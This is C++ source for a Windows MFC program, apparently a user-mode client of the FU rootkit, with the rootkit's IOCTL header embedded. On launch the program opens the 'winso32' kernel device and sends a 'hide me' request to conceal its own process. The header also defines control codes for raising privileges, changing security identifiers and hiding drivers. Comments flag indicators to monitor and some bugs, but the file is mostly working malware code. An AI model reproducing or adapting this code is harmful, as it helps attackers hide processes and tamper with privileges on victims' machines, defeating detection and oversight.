// KillSD.cpp : Defines the class behaviors for the application.
//
#include "stdafx.h"
#include "KillSD.h"
#include "KillSDDlg.h"
#ifdef _DEBUG
#define new DEBUG_NEW
#undef THIS_FILE
static char THIS_FILE[] = __FILE__;
#endif
/////////////////////////////////////////////////////////////////////////////
// CKillSDApp
// Message map for CKillSDApp.  The only explicit entry routes ID_HELP to
// the stock CWinApp::OnHelp handler; everything else falls through to
// CWinApp's defaults.
BEGIN_MESSAGE_MAP(CKillSDApp, CWinApp)
	//{{AFX_MSG_MAP(CKillSDApp)
		// NOTE - the ClassWizard will add and remove mapping macros here.
		//    DO NOT EDIT what you see in these blocks of generated code!
	//}}AFX_MSG
	ON_COMMAND(ID_HELP, CWinApp::OnHelp)
END_MESSAGE_MAP()
/////////////////////////////////////////////////////////////////////////////
// CKillSDApp construction
// CKillSDApp constructor.  Intentionally empty: per MFC convention all
// real start-up work (including the driver call) lives in InitInstance().
CKillSDApp::CKillSDApp()
{
	// TODO: add construction code here,
	// Place all significant initialization in InitInstance
}
/////////////////////////////////////////////////////////////////////////////
// The one and only CKillSDApp object
CKillSDApp theApp;

// -- Forward declaration (defined at the end of this file).  Opens the
//    "winso32" device and asks the driver to hide the calling process.
BOOL InvokeDeviceHideProcess( void );
/////////////////////////////////////////////////////////////////////////////
// CKillSDApp initialization
// CKillSDApp::InitInstance
//
// MFC application entry point.  Before the main dialog is shown the app
// calls into the kernel driver to hide its own process; the BOOL result of
// that call is discarded, so the dialog is displayed whether or not the
// driver is loaded.  Returns FALSE so MFC terminates once the modal dialog
// is dismissed instead of entering a message pump.
BOOL CKillSDApp::InitInstance()
{
	// Standard initialization
	// If you are not using these features and wish to reduce the size
	//  of your final executable, you should remove from the following
	//  the specific initialization routines you do not need.

	// -- hide this process via the driver.  The return value is not
	//    checked, so a missing driver or a failed IOCTL is silent here.
	InvokeDeviceHideProcess();

	CKillSDDlg dlg;
	m_pMainWnd = &dlg;
	int nResponse = dlg.DoModal();
	if (nResponse == IDOK)
	{
		// TODO: Place code here to handle when the dialog is
		//  dismissed with OK
	}
	else if (nResponse == IDCANCEL)
	{
		// TODO: Place code here to handle when the dialog is
		//  dismissed with Cancel
	}

	// Since the dialog has been closed, return FALSE so that we exit the
	//  application, rather than start the application's message pump.
	return FALSE;
}
///////////////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////////////
// Filename ioctlcmd.h
//
// Author: fuzen_op
// Email: fuzen_op@yahoo.com or fuzen_op@rootkit.com
//
// Description: Defines the IOCTL's used by the driver and the controlling DLL.
//
// Date: 5/27/2003
// Version: 1.0
// ---------------------------------------------------------------------------
// IOCTL interface shared with the kernel driver (copied from ioctlcmd.h).
//
// FILE_DEVICE_ROOTKIT, the METHOD_* / FILE_*_ACCESS values and CTL_CODE
// re-declare the control-code layout normally provided by <winioctl.h>
// (device type in bits 16..31, access in bits 14..15, function number in
// bits 2..13, transfer method in bits 0..1).  Including that SDK header in
// the same translation unit would produce macro-redefinition warnings.
//
// Because every code below is derived from the fixed device type 0x2a7b,
// the resulting constants are stable, static values; from a monitoring
// standpoint they are the indicators to match when auditing
// DeviceIoControl traffic to the "winso32" device.
// ---------------------------------------------------------------------------
#define FILE_DEVICE_ROOTKIT 0x00002a7b

#define METHOD_BUFFERED 0
#define METHOD_IN_DIRECT 1
#define METHOD_OUT_DIRECT 2
#define METHOD_NEITHER 3

#define FILE_ANY_ACCESS 0
#define FILE_READ_ACCESS ( 0x0001 ) // file & pipe
#define FILE_WRITE_ACCESS ( 0x0002 ) // file & pipe

// Same bit layout as the SDK CTL_CODE macro; see the header comment above.
#define CTL_CODE( DeviceType, Function, Method, Access ) ( \
((DeviceType) << 16) | ((Access) << 14) | ((Function) << 2) | (Method) \
)

// Function numbers 0x01..0x08.  The list is not in numeric order (SETPRIV
// is 0x05, SETAUTHID is 0x04).  Only IOCTL_ROOTKIT_HIDEME is referenced by
// the code in this file; the rest document the driver's full surface.
#define IOCTL_ROOTKIT_INIT (ULONG) CTL_CODE(FILE_DEVICE_ROOTKIT, 0x01, METHOD_BUFFERED, FILE_WRITE_ACCESS)
#define IOCTL_ROOTKIT_HIDEME (ULONG) CTL_CODE(FILE_DEVICE_ROOTKIT, 0x02, METHOD_BUFFERED, FILE_WRITE_ACCESS)
#define IOCTL_ROOTKIT_LISTPROC (ULONG) CTL_CODE(FILE_DEVICE_ROOTKIT, 0x03, METHOD_BUFFERED, FILE_WRITE_ACCESS)
#define IOCTL_ROOTKIT_SETPRIV (ULONG) CTL_CODE(FILE_DEVICE_ROOTKIT, 0x05, METHOD_BUFFERED, FILE_WRITE_ACCESS)
#define IOCTL_ROOTKIT_SETAUTHID (ULONG) CTL_CODE(FILE_DEVICE_ROOTKIT, 0x04, METHOD_BUFFERED, FILE_WRITE_ACCESS)
#define IOCTL_ROOTKIT_SETSID (ULONG) CTL_CODE(FILE_DEVICE_ROOTKIT, 0x06, METHOD_BUFFERED, FILE_WRITE_ACCESS)
#define IOCTL_ROOTKIT_LISTDRIV (ULONG) CTL_CODE(FILE_DEVICE_ROOTKIT, 0x07, METHOD_BUFFERED, FILE_WRITE_ACCESS)
#define IOCTL_ROOTKIT_HIDEDRIV (ULONG) CTL_CODE(FILE_DEVICE_ROOTKIT, 0x08, METHOD_BUFFERED, FILE_WRITE_ACCESS)

// Extracts the METHOD_* transfer type (low two bits) from a control code.
#define IOCTL_TRANSFER_TYPE( _iocontrol) (_iocontrol & 0x3)
// Device label used by OpenDevice() to build "\\.\Global\winso32" (or
// "\\.\winso32" when the reported major version is below 5), and the
// matching driver image name.  These two strings are the most direct
// host-level indicators of this tool.  ac_driverName is declared but not
// referenced anywhere in the code shown in this file.
static CHAR ac_driverLabel[] = "winso32";
static CHAR ac_driverName[] = "winso32.sys";
// OpenDevice
//
// Opens a handle to the named device object.  When the low byte of
// GetVersion() (the major OS version) is 5 or greater the name is built in
// the \\.\Global\ namespace, otherwise as plain \\.\<name>.
//
//  DriverName  - device name without any \\.\ prefix.
//  lphDevice   - receives the opened handle.  If NULL, the handle is closed
//                again immediately and the call degrades to an existence
//                probe for the device.
//
//  Returns TRUE when CreateFile succeeded, FALSE otherwise (GetLastError()
//  holds the reason; the caller here does not inspect it).
//
// NOTE(review): completeDeviceName is a fixed 64-TCHAR buffer filled with an
// unbounded wsprintf.  A DriverName long enough that prefix + name + NUL
// exceed 64 TCHARs would overflow it; the only caller passes "winso32".
BOOL OpenDevice( IN LPCTSTR DriverName, HANDLE * lphDevice )
{
	TCHAR completeDeviceName[64];
	HANDLE hDevice;

	if( (GetVersion() & 0xFF) >= 5 ) {
		wsprintf( completeDeviceName, TEXT("\\\\.\\Global\\%s"), DriverName );
	} else {
		wsprintf( completeDeviceName, TEXT("\\\\.\\%s"), DriverName );
	}

	// Read/write, no sharing, must already exist.
	hDevice = CreateFile( completeDeviceName,
		GENERIC_READ | GENERIC_WRITE,
		0,
		NULL,
		OPEN_EXISTING,
		FILE_ATTRIBUTE_NORMAL,
		NULL
		);

	// (HANDLE)-1 is INVALID_HANDLE_VALUE, CreateFile's failure sentinel.
	if ( hDevice == ((HANDLE)-1) )
		return FALSE;

	// Hand the handle back, or release it if the caller only wanted a probe.
	if ( lphDevice )
		*lphDevice = hDevice;
	else
		CloseHandle( hDevice );

	return TRUE;
}
// HideProc
//
// Sends IOCTL_ROOTKIT_HIDEME to the driver with the target PID as the
// sizeof(DWORD) input buffer.  No output buffer is supplied.
//
//  lphDevice - device handle obtained from OpenDevice().  Despite the
//              "lp" prefix this is the HANDLE itself, not a pointer to one.
//  pid       - process id handed to the driver.
//
//  Returns DeviceIoControl's BOOL result widened to DWORD: nonzero means
//  the driver accepted the request, 0 means the call failed (GetLastError()
//  has the reason).  d_bytesRead is required by the API but never examined.
DWORD HideProc(HANDLE lphDevice,DWORD pid)
{
	DWORD d_bytesRead;
	DWORD success;

	success = DeviceIoControl(
		lphDevice,
		IOCTL_ROOTKIT_HIDEME,
		(void *) &pid,
		sizeof(DWORD),
		NULL,
		0,
		&d_bytesRead,
		NULL);

	return success;
}
// InvokeDeviceHideProcess
//
// Opens the "winso32" device, asks the driver to hide the calling process
// (GetCurrentProcessId()) and closes the handle again.
//
// Returns FALSE when the device could not be opened (no handle is leaked
// in that path because none was obtained).  Otherwise the result is
// inverted: HideProc() returns nonzero on success, and the `0 != dwRes`
// test below clears Okoy in exactly that case, so the function reports
// FALSE after a successful request and TRUE after a failed one.  The only
// caller in this file (InitInstance) discards the value, so the defect has
// no visible effect here.
BOOL InvokeDeviceHideProcess(void)
{
	BOOL Okoy = FALSE;
	HANDLE hDevice = NULL;

	Okoy = OpenDevice( ac_driverLabel, &hDevice );
	if( FALSE == Okoy )
	{
		return FALSE;
	}

	// dwRes is DeviceIoControl's BOOL: nonzero == success (see HideProc).
	DWORD dwRes = HideProc( hDevice, ::GetCurrentProcessId() );
	if( 0 != dwRes )
	{
		Okoy = FALSE;
	}

	::CloseHandle( hDevice );
	return Okoy;
}